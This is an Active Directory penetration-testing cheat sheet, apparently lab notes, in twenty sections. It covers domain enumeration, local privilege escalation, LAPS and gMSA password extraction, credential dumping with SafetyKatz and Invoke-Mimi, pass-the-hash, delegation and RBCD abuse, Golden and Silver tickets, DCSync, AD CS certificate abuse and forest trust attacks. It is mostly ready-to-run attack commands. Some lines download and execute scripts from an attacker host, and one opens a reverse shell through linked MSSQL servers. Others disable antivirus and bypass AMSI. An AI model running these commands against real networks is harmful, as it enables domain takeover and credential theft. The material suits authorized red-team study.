// 01
AD Enumeration
AD Module
PowerShell
Import-Module Microsoft.ActiveDirectory.Management.dll Import-Module ActiveDirectory.psd1
PowerShell - AD Module Queries
Get-ADUser -Filter * | Select -ExpandProperty samaccountname
Get-ADComputer -Filter * | select -expand name
Get-ADGroup -Identity 'Domain Admins' -Properties *
Get-ADGroup -Identity <GROUP> -Properties Description
Get-ADGroupMember -Identity 'Domain Admins'
Get-ADGroupMember -Identity 'Enterprise Admins'
Get-ADGroupMember -Identity 'Enterprise Admins' -Server <PARENT_DOMAIN>
Get-ADOrganizationalUnit -Identity 'OU=<OU_NAME>,DC=<DOMAIN>,DC=local' | %{Get-ADComputer -SearchBase $_ -Filter *} | select name
Get-ACL 'AD:\CN=Domain Admins,CN=Users,DC=<DOMAIN>,DC=local' | select -ExpandProperty Access
(Get-ADForest).Domains
Get-ADTrust -Filter *
Get-ADTrust -Filter 'intraForest -ne $True' -Server (Get-ADForest).Name
(Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_}
Get-ADTrust -Filter * -Server <TARGET_DOMAIN>
PowerView
PowerShell - PowerView
. .\PowerView.ps1
(Get-DomainPolicy).KerberosPolicy
Get-DomainGPOLocalGroup
Get-DomainGroupMember -Identity <GROUP>
Get-DomainOU
(Get-DomainOU -Identity <OU>).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
Get-DomainGPO
(Get-DomainOU -Identity <OU>).gplink
Get-DomainGPO -Identity '{<GPO_ID>}'
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<USER>"}
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<GROUP>"}
Get-ForestDomain -Verbose | Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'}
Get-ForestTrust -Forest <FOREST>
// 02
Local Privilege Escalation
PowerUp
PowerShell
. .\PowerUp.ps1 Invoke-AllChecks Invoke-ServiceAbuse -Name <SERVICE> -UserName <DOMAIN>\<USER> -Verbose
Manual Service Abuse (accesschk64)
CMD
.\accesschk64.exe -uwcqv '<USER>' * sc.exe config <SERVICE> binPath= "net localgroup administrators <DOMAIN>\<USER> /add" sc.exe stop <SERVICE> sc.exe start <SERVICE> sc.exe config <SERVICE> binPath= "<ORIGINAL_BINPATH>" sc.exe stop <SERVICE> sc.exe start <SERVICE>
Find Local Admin Access
PowerShell
Find-LocalAdminAccess -Verbose Find-WMILocalAdminAccess.ps1 Find-PSRemotingLocalAdminAccess.ps1
Recursive Group Membership
PowerShell
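function Get-ADPrincipalGroupMembershipRecursive ($SamAccountName, $Visited = @{}) {
    <#
    .SYNOPSIS
        Lists the distinguished names of every group a principal belongs to,
        directly or through nested group membership.
    .PARAMETER SamAccountName
        Identity handed to Get-ADPrincipalGroupMembership: a samAccountName on
        the first call, a group distinguished name on each recursive call.
    .PARAMETER Visited
        Hashtable of group DNs already emitted. Callers normally leave it at its
        default; recursive calls share the one table so that circular nesting
        (group A in B, B in A) cannot recurse forever and each DN is written once.
    .OUTPUTS
        System.String - one group distinguished name per output object.
    #>
    $groups = @(Get-ADPrincipalGroupMembership -Identity $SamAccountName |
        Select-Object -ExpandProperty distinguishedname)
    foreach ($group in $groups) {
        # Recursion guard: a DN already reported is neither emitted nor expanded again.
        if ($Visited.ContainsKey($group)) { continue }
        $Visited[$group] = $true
        $group
        Get-ADPrincipalGroupMembershipRecursive $group $Visited
    }
}
ACL Enumeration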
PowerShell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match '<GROUP>'}
Get-DomainObjectAcl -Identity <GROUP> -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match '<TARGET_GROUP>'}
// 03
LAPS - Local Admin Password Solution
Enumeration
PowerShell
Import-Module AdmPwd.PS.psd1 -Verbose Get-LapsPermissions.ps1
Find LAPS Read Permissions (PowerView)
PowerShell
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier); $_}
Read Cleartext Password
PowerShell
# AD Module Get-ADComputer -Identity <COMPUTER> -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd # AdmPwd Module Get-AdmPwdPassword -ComputerName <COMPUTER> # PowerView Get-DomainObject -Identity <COMPUTER> | select -ExpandProperty ms-mcs-admpwd
Access Machine with LAPS Password
PowerShell
winrs -r:<COMPUTER> -u:.\administrator -p:<LAPS_PASSWORD> cmd
$passwd = ConvertTo-SecureString '<LAPS_PASSWORD>' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("<COMPUTER>\administrator", $passwd)
$session = New-PSSession -ComputerName <COMPUTER> -Credential $creds
// 04
Credential Extraction
Copy Loader & Dump Credentials
CMD
# Copy loader to target echo F | xcopy Loader.exe \\<TARGET>\C$\Users\Public\Loader.exe # Setup port forwarding to avoid detection winrs -r:<TARGET> -u:.\administrator -p:<PASSWORD> cmd netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<ATTACKER_IP> # Dump credentials C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::keys
BitsAdmin (Signed Binary) for Download
CMD
bitsadmin /transfer WindowsUpdates /priority normal http://127.0.0.1:8080/Loader.exe C:\\Users\\Public\\Loader.exe
PowerShell Remoting & Invoke-Mimi
PowerShell
$passwd = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("<TARGET>\administrator", $passwd)
$session = New-PSSession -ComputerName <TARGET> -Credential $creds
# Bypass AMSI first, then:
Invoke-Command -FilePath Invoke-Mimi.ps1 -Session $session
Enter-PSSession $session
Invoke-Mimi -Command '"sekurlsa::keys"'
// 05
gMSA - Group Managed Service Accounts
PowerShell - Enumerate gMSA
Get-ADServiceAccount -Filter * Get-ADServiceAccount -Identity <GMSA_ACCOUNT> -Properties * | select PrincipalsAllowedToRetrieveManagedPassword
You need a shell as the user who has permission to read the gMSA password.
PowerShell - Extract & Decode Password
# Import AD Module, then: $Passwordblob = (Get-ADServiceAccount -Identity <GMSA_ACCOUNT> -Properties msDS-ManagedPassword).'msDS-ManagedPassword' # Decode with DSInternals Import-Module DSInternals.psd1 $decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword # Then PTH with the extracted hash to check access
// 06
Pass The Hash
OverPass-The-Hash (Elevated Shell)
CMD
# Using AES256 SafetyKatz.exe "sekurlsa::opassth /user:<USER> /domain:<DOMAIN> /aes256:<AES256_HASH> /run:cmd.exe" "exit" # Using NTLM SafetyKatz.exe "sekurlsa::opassth /user:<USER> /domain:<DOMAIN> /ntlm:<NTLM_HASH> /run:cmd.exe" "exit" # S4U with Rubeus Rubeus.exe s4u /user:<USER> /aes256:<AES256_HASH> /impersonateuser:administrator /msdsspn:CIFS/<TARGET.DOMAIN> /altservice:HTTP /domain:<DOMAIN> /ptt
From Non-Elevated Shell
CMD
Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /aes256:<AES256_HASH> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
// 07
AppLocker, CLM & WDAC
PowerShell
# Check if PowerShell is in Constrained Language Mode $ExecutionContext.SessionState.LanguageMode # Check AppLocker (error = not in use) reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2 Get-AppLockerPolicy -Effective # Check WDAC Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard # CodeIntegrityPolicyEnforcementStatus : 2 = Enforced # UsermodeCodeIntegrityPolicyEnforcementStatus : 2 = Enforced
// 08
Unconstrained Delegation
Find Unconstrained Delegation
PowerShell
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Printer Bug Abuse
Access the machine with Unconstrained Delegation first, then monitor for incoming TGTs.
CMD
# Copy Rubeus to the UD machine echo F | xcopy Rubeus.exe \\<UD_MACHINE>\C$\Users\Public\Rubeus.exe /Y # Monitor for incoming TGTs winrs -r:<UD_MACHINE> cmd.exe C:\Users\Public\Rubeus.exe monitor /targetuser:<DC>$ /interval:5 /nowrap # Trigger the Printer Bug from another shell MS-RPRN.exe \\<DC.DOMAIN> \\<UD_MACHINE.DOMAIN> # Inject the captured TGT Rubeus.exe ptt /ticket:<BASE64_TGT> # DCSync with the DC ticket SharpKatz.exe --Command dcsync --User <DOMAIN>\krbtgt --Domain <DOMAIN> --DomainController <DC.DOMAIN>
Alternative: PowerShell Remoting
PowerShell
$session = New-PSSession <UD_MACHINE> Copy-Item -ToSession $session -Path Rubeus.exe -Destination C:\Users\Public Enter-PSSession $session cd C:\Users\Public .\Rubeus.exe monitor /targetuser:<DC>$ /interval:5 /nowrap
Cross-Forest (If TGT Delegation Enabled)
CMD
# Same technique but target the foreign forest DC # 1. Get TGT and access UD machine # 2. Send Rubeus to UD machine # 3. Monitor for foreign DC TGT # 4. Trigger MS-RPRN against foreign DC # 5. PTT and DCSync foreign forest SharpKatz.exe --Command dcsync --User <FOREIGN_DOMAIN>\krbtgt --Domain <FOREIGN_DOMAIN> --DomainController <FOREIGN_DC>
// 09
Constrained Delegation
Find Constrained Delegation
PowerShell
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
# Cross-forest
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo -Server <TARGET_DOMAIN>
S4U Abuse with Rubeus
CMD
# Generate RC4 hash from password Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN> # S4U to get LDAP ticket (for DCSync) Rubeus.exe s4u /user:<USER> /rc4:<RC4_HASH> /impersonateuser:Administrator /domain:<DOMAIN> /msdsspn:nmagent/<DC.DOMAIN> /altservice:ldap /dc:<DC.DOMAIN> /ptt # DCSync with LDAP service ticket SharpKatz.exe --Command dcsync --User <DOMAIN>\krbtgt --Domain <DOMAIN> --DomainController <DC.DOMAIN> SharpKatz.exe --Command dcsync --User <DOMAIN>\administrator --Domain <DOMAIN> --DomainController <DC.DOMAIN>
// 10
ACL Abuse & RBCD
Enumerate ACL Permissions
PowerShell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match '<USER>'}
Resource-Based Constrained Delegation (RBCD)
If you have GenericWrite over a computer object, you can set RBCD.
PowerShell
# Set RBCD $comps = '<MACHINE1>$','<MACHINE2>$' Set-ADComputer -Identity <TARGET> -PrincipalsAllowedToDelegateToAccount $comps -Verbose # Extract AES key of your machine (SID S-1-5-18 = SYSTEM) SafetyKatz.exe -Command "sekurlsa::keys" "exit" # S4U to get HTTP access Rubeus.exe s4u /user:<MACHINE>$ /aes256:<AES256_HASH> /msdsspn:http/<TARGET> /impersonateuser:administrator /ptt # S4U to get CIFS access (file system) Rubeus.exe s4u /user:<MACHINE>$ /aes256:<AES256_HASH> /msdsspn:cifs/<TARGET> /impersonateuser:administrator /ptt # Copy loader and dump credentials echo F | xcopy Loader.exe \\<TARGET>\C$\Users\Public\Loader.exe /Y winrs -r:<TARGET> cmd netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<ATTACKER_IP> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
// 11
Golden & Silver Tickets
Golden Ticket
CMD - BetterSafetyKatz
BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /aes256:<KRBTGT_AES256> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" klist
Golden Ticket with Invoke-Mimi
PowerShell
. .\Invoke-Mimi.ps1
Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /aes256:<KRBTGT_AES256> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
$sess = New-PSSession <TARGET>
Enter-PSSession -Session $sess
# Bypass AMSI, then:
Invoke-Command -FilePath Invoke-Mimi.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimi -Command '"lsadump::lsa /patch"'
Silver Ticket
CMD
BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /target:<TARGET_SERVER> /service:HOST /aes256:<SERVICE_AES256> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" klist
// 12
DCSync
Check Replication Rights
PowerShell
Get-DomainObjectAcl -SearchBase "dc=<DOMAIN>,dc=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "<USER>"}
Add DCSync Rights (Requires DA)
PowerShell
# PowerView Add-DomainObjectAcl -TargetIdentity "dc=<DOMAIN>,dc=local" -PrincipalIdentity <USER> -Rights DCSync -PrincipalDomain <DOMAIN> -TargetDomain <DOMAIN> -Verbose # AD Module with RACE toolkit Set-ADACL -DistinguishedName 'DC=<DOMAIN>,DC=local' -SamAccountName <USER> -GUIDRight DCSync -Verbose
Execute DCSync
CMD
SafetyKatz.exe "lsadump::dcsync /user:<DOMAIN>\krbtgt" "exit"
# Or with Invoke-Mimi
Invoke-Mimi -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'
// 13
AD CS - Certificates
Enumerate Certificate Authorities
CMD
Certify.exe cas Certify.exe find Certify.exe find /enrolleeSuppliesSubject
ENROLLEE_SUPPLIES_SUBJECT means the requester supplies the subject name, so a certificate can be requested for any user.
Request Certificate as Another User (ESC1)
CMD
# Request cert as Administrator Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<VULNERABLE_TEMPLATE> /altname:Administrator # Save output between BEGIN RSA PRIVATE KEY and END CERTIFICATE as cert.pem # Convert to PFX openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out DA.pfx # Request TGT as DA Rubeus.exe asktgt /user:Administrator /certificate:DA.pfx /password:<PFX_PASSWORD> /nowrap /ptt winrs -r:<DC> whoami
Escalate to Enterprise Admin
CMD
# Request and convert cert for EA, then:
Rubeus.exe asktgt /user:<PARENT_DOMAIN>\Administrator /dc:<PARENT_DC> /certificate:EA.pfx /password:<PFX_PASSWORD> /nowrap /ptt
winrs -r:<PARENT_DC> whoami
// 14
Azure AD Connect
Find MSOL Account
PowerShell
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server <DOMAIN> -Properties * | select SamAccountName,Description | fl
Extract MSOL Credentials
PowerShell
# Get access to the AD Connect server Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /aes256:<AES256_HASH> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt # Copy InviShell to target echo F | xcopy InShellProf.dll \\<ADCONNECT_SERVER>\C$\Users\<USER>\Downloads\InShellProf.dll /Y echo F | xcopy RunWithRegistryNonAdmin.bat \\<ADCONNECT_SERVER>\C$\Users\<USER>\Downloads\RunWithRegistryNonAdmin.bat /Y # Access and extract winrs -r:<ADCONNECT_SERVER> cmd RunWithRegistryNonAdmin.bat iex (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/adconnect.ps1') ADconnect
DCSync with MSOL Account
CMD
runas /user:<DOMAIN>\<MSOL_ACCOUNT> /netonly cmd SafetyKatz.exe "lsadump::dcsync /user:<DOMAIN>\administrator /domain:<DOMAIN>" "exit"
// 15
Domain Privesc - Trust Key & KRBTGT
Extract Trust Key
CMD
# Access DC with DA privileges Rubeus.exe asktgt /user:administrator /aes256:<AES256_HASH> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt # Copy loader and dump trust keys echo F | xcopy Loader.exe \\<DC>\C$\Users\Public\Loader.exe /Y winrs -r:<DC> cmd netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<ATTACKER_IP> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe lsadump::trust /patch # Grab RC4 of child domain -> parent domain trust
Inter-Realm TGT with Trust Key
CMD
BetterSafetyKatz.exe "kerberos::golden /domain:<CHILD_DOMAIN> /sid:<CHILD_SID> /sids:<PARENT_SID>-519 /rc4:<TRUST_RC4> /user:Administrator /service:krbtgt /target:<PARENT_DOMAIN> /ticket:trust_tkt.kirbi" "exit" Rubeus.exe asktgs /ticket:trust_tkt.kirbi /service:CIFS/<PARENT_DC> /dc:<PARENT_DC> /ptt klist dir \\<PARENT_DC>\c$
Using KRBTGT Hash (SID History)
CMD
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:<CHILD_DOMAIN> /sid:<CHILD_SID> /krbtgt:<KRBTGT_HASH> /sids:<PARENT_SID>-519 /ptt" "exit" klist winrs -r:<PARENT_DC> cmd
// 16
Forest Trust Abuse
Forge Inter-Realm TGT
CMD
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<TRUST_RC4> /service:krbtgt /target:<FOREIGN_DOMAIN> /sids:<FOREIGN_EA_SID>-519 /ticket:cross_forest.kirbi" "exit" Rubeus.exe asktgs /ticket:cross_forest.kirbi /service:CIFS/<FOREIGN_DC> /dc:<FOREIGN_DC> /ptt dir \\<FOREIGN_DC>\<SHARE_NAME>
SID History Injection (Cross-Forest)
PowerShell
# Check for groups with SID > 1000
Get-ADGroup -Filter 'SID -ge "S-1-5-21-<FOREIGN_DOMAIN_ID>-1000"' -Server <FOREIGN_DOMAIN>
CMD
# Create ticket with SIDHistory of target group BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<TRUST_RC4> /service:krbtgt /target:<FOREIGN_DOMAIN> /sids:<TARGET_GROUP_SID> /ticket:sidhistory.kirbi" "exit" # Request TGS for HTTP (PSRemoting) Rubeus.exe asktgs /ticket:sidhistory.kirbi /service:HTTP/<FOREIGN_SERVER> /dc:<FOREIGN_DC> /ptt winrs -r:<FOREIGN_SERVER> cmd
// 17
MSSQL Abuse
Enumerate SQL Links
PowerShell - PowerUpSQL
Import-Module PowerupSQL.psd1
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLServerLink -Instance <SQL_SERVER> -Verbose
Get-SQLServerLinkCrawl -Instance <SQL_SERVER> -Verbose
# Execute commands through links
Get-SQLServerLinkCrawl -Instance <SQL_SERVER> -Query 'exec master..xp_cmdshell ''whoami'''
Reverse Shell via SQL Links
PowerShell
# Start listener . .\powercat.ps1 powercat -l -v -p 443 -t 1000 # Trigger reverse shell through SQL link Get-SQLServerLinkCrawl -Instance <SQL_SERVER> -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://<ATTACKER_IP>/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://<ATTACKER_IP>/amsibypass.txt);iex (iwr -UseBasicParsing http://<ATTACKER_IP>/Invoke-PowerShellTcpEx.ps1)"'''
Enable RPC Out & xp_cmdshell (SA Required)
PowerShell
Invoke-SqlCmd -Query "exec sp_serveroption @server='<LINKED_SERVER>', @optname='rpc', @optvalue='TRUE'"
Invoke-SqlCmd -Query "exec sp_serveroption @server='<LINKED_SERVER>', @optname='rpc out', @optvalue='TRUE'"
Invoke-SqlCmd -Query "EXECUTE ('sp_configure ''show advanced options'',1;reconfigure;') AT ""<LINKED_SERVER>"""
Invoke-SqlCmd -Query "EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure') AT ""<LINKED_SERVER>"""
# Execute on specific target in the link chain
Get-SQLServerLinkCrawl -Instance <SQL_SERVER> -Query 'exec master..xp_cmdshell ''whoami''' -QueryTarget <LINKED_SERVER>
// 18
Foreign Security Principals
PowerShell
# Enumerate trust relationships Get-ForestTrust # Look for: TrustType = Forest, TrustDirection = Bidirectional # Find interesting ACLs in foreign domain Find-InterestingDomainAcl -ResolveGUIDs -Domain <FOREIGN_DOMAIN> # Look for: GenericAll over an ObjectDN # If you have GenericAll, reset the password Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword (ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force) -Domain <FOREIGN_DOMAIN> -Verbose # Enumerate FSPs Find-ForeignGroup -Verbose # Identify the user behind the SID Get-DomainUser -Domain <FOREIGN_DOMAIN> | ?{$_.ObjectSid -eq '<FSP_SID>'}
Access Foreign Domain
PowerShell
# WinRS winrs -r:<FOREIGN_DC> -u:<FOREIGN_DOMAIN>\<USER> -p:<PASSWORD> "whoami" # PSRemoting $passwd = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential ("<FOREIGN_DOMAIN>\<USER>", $passwd) $session = New-PSSession -Computername <FOREIGN_DC> -Credential $creds Invoke-Command -scriptblock{whoami;hostname} -Session $session
// 19
PAM Trust
Enumerate Foreign Security Principals
PowerShell
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server <DOMAIN>
# Find which DA group the FSP belongs to
Get-ADGroup -Filter * -Properties Member -Server <DOMAIN> | ?{$_.Member -match '<FSP_SID>'}
Check PAM Trust
PowerShell
Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
# Look for: ForestTransitive = True, SIDFilteringForestAware = False
Check Shadow Principals
PowerShell
Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name, member, msDS-ShadowPrincipalSid | fl
Access via PAM Trust
PowerShell
# Get DA access and enumerate further forests Rubeus.exe asktgt /domain:<DOMAIN> /user:administrator /aes256:<AES256_HASH> /dc:<DC> /createnetonly:C:\Windows\System32\cmd.exe /show /ptt # Check PAM in further forests Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} -Server <TARGET_FOREST> # Look for: SIDFilteringForestAware = True # Get target forest IP Get-DnsServerZone -ZoneName <TARGET_FOREST> | fl * # Modify TrustedHosts (elevated shell required) Set-Item WSMan:\localhost\Client\TrustedHosts * -Force # Access via PSRemoting SafetyKatz.exe "sekurlsa::opassth /user:administrator /domain:<DOMAIN> /ntlm:<NTLM_HASH> /run:powershell.exe" "exit" Enter-PSSession <TARGET_IP> -Authentication NegotiateWithImplicitCredential
// 20
Recurring Commands
BloodHound Collection
CMD
SharpHound.exe --CollectionMethods All
Module Imports
PowerShell
# InviShell (bypass) RunWithRegistryNonAdmin.bat # AD Module Import-Module Microsoft.ActiveDirectory.Management.dll Import-Module ActiveDirectory.psd1 # PowerView . .\PowerView.ps1 # Invoke-Mimi . .\Invoke-Mimi.ps1
Common Access Methods
PowerShell
# WinRS winrs -r:<TARGET> cmd winrs -r:<TARGET> -u:.\administrator -p:<PASSWORD> cmd # PSSession $passwd = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential ("<DOMAIN>\<USER>", $passwd) $session = New-PSSession -ComputerName <TARGET> -Credential $creds # Copy files echo F | xcopy Loader.exe \\<TARGET>\C$\Users\Public\Loader.exe /Y # Port forwarding netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<ATTACKER_IP> # Download from attacker iex (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/<SCRIPT>.ps1')
Find Remote Access
PowerShell
. .\Find-PSRemotingLocalAdminAccess.ps1 Find-PSRemotingLocalAdminAccess -Domain <DOMAIN> -Verbose
Get Domain SID
PowerShell
Get-DomainSID Get-DomainSID -Domain <TARGET_DOMAIN>
AMSI Bypass
PowerShell
# Use obfuscated AMSI bypass before running any PowerShell tools # Multiple techniques available - use the one that works in your environment
Disable AV (If Admin)
PowerShell
Set-MpPreference -DisableRealtimeMonitoring $true
Runas with Network Credentials
CMD
runas /user:<DOMAIN>\<USER> /netonly cmd
DCSync
CMD
SafetyKatz.exe "lsadump::dcsync /user:<DOMAIN>\administrator /domain:<DOMAIN>" "exit"
Enumerate Resources
CMD
dir \\<DC>\c$